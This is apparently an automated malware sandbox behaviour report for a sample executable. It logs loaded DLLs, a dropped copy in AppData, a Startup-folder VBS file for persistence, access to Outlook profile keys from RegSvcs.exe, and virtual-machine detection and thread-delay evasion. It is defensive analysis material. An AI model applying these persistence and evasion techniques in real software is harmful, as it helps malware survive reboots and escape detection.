Source: C:\Users\user\Desktop\q6utlq83i0.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\q6utlq83i0.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\q6utlq83i0.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\q6utlq83i0.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\q6utlq83i0.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\q6utlq83i0.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Users\user\Desktop\q6utlq83i0.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Users\user\Desktop\q6utlq83i0.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\q6utlq83i0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
Source: q6utlq83i0.exeStatic file information: File size 1301411 > 1048576
Source: Binary string: wntdll.pdbUGP source: incalculability.exe, 00000001.00000003.1749762795.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, incalculability.exe, 00000001.00000003.1747982807.0000000004720000.00000004.00001000.00020000.00000000.sdmp, incalculability.exe, 00000005.00000003.1897663711.0000000004720000.00000004.00001000.00020000.00000000.sdmp, incalculability.exe, 00000005.00000003.1897923919.0000000004580000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: incalculability.exe, 00000001.00000003.1749762795.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, incalculability.exe, 00000001.00000003.1747982807.0000000004720000.00000004.00001000.00020000.00000000.sdmp, incalculability.exe, 00000005.00000003.1897663711.0000000004720000.00000004.00001000.00020000.00000000.sdmp, incalculability.exe, 00000005.00000003.1897923919.0000000004580000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0040EBD0 LoadLibraryA,GetProcAddress,5_2_0040EBD0
Source: incalculability.exe.0.drStatic PE information: real checksum: 0xa961f should be: 0x142e9f
Source: q6utlq83i0.exeStatic PE information: real checksum: 0xa961f should be: 0x142e9f
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_00462463 push edi; ret 5_2_00462465
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_00416CB5 push ecx; ret 5_2_00416CC8
Source: C:\Users\user\Desktop\q6utlq83i0.exeFile created: C:\Users\user\AppData\Local\inhumate\incalculability.exeJump to dropped file

Boot Survival

barindex
Drops VBS files to the startup folder
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\incalculability.vbsJump to dropped file
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\incalculability.vbsJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\incalculability.vbsJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_0047A330 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,5_2_0047A330
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeCode function: 5_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,5_2_00434418
Source: C:\Users\user\Desktop\q6utlq83i0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeAPI/Special instruction interceptor: Address: 40FC2E4
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeAPI/Special instruction interceptor: Address: 3F28B04
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeAPI/Special instruction interceptor: Address: 3F39754
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1924Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 3154Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1235Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 4639Jump to behavior
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_5-85712
Source: C:\Users\user\AppData\Local\inhumate\incalculability.exeAPI coverage: 3.8 %
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
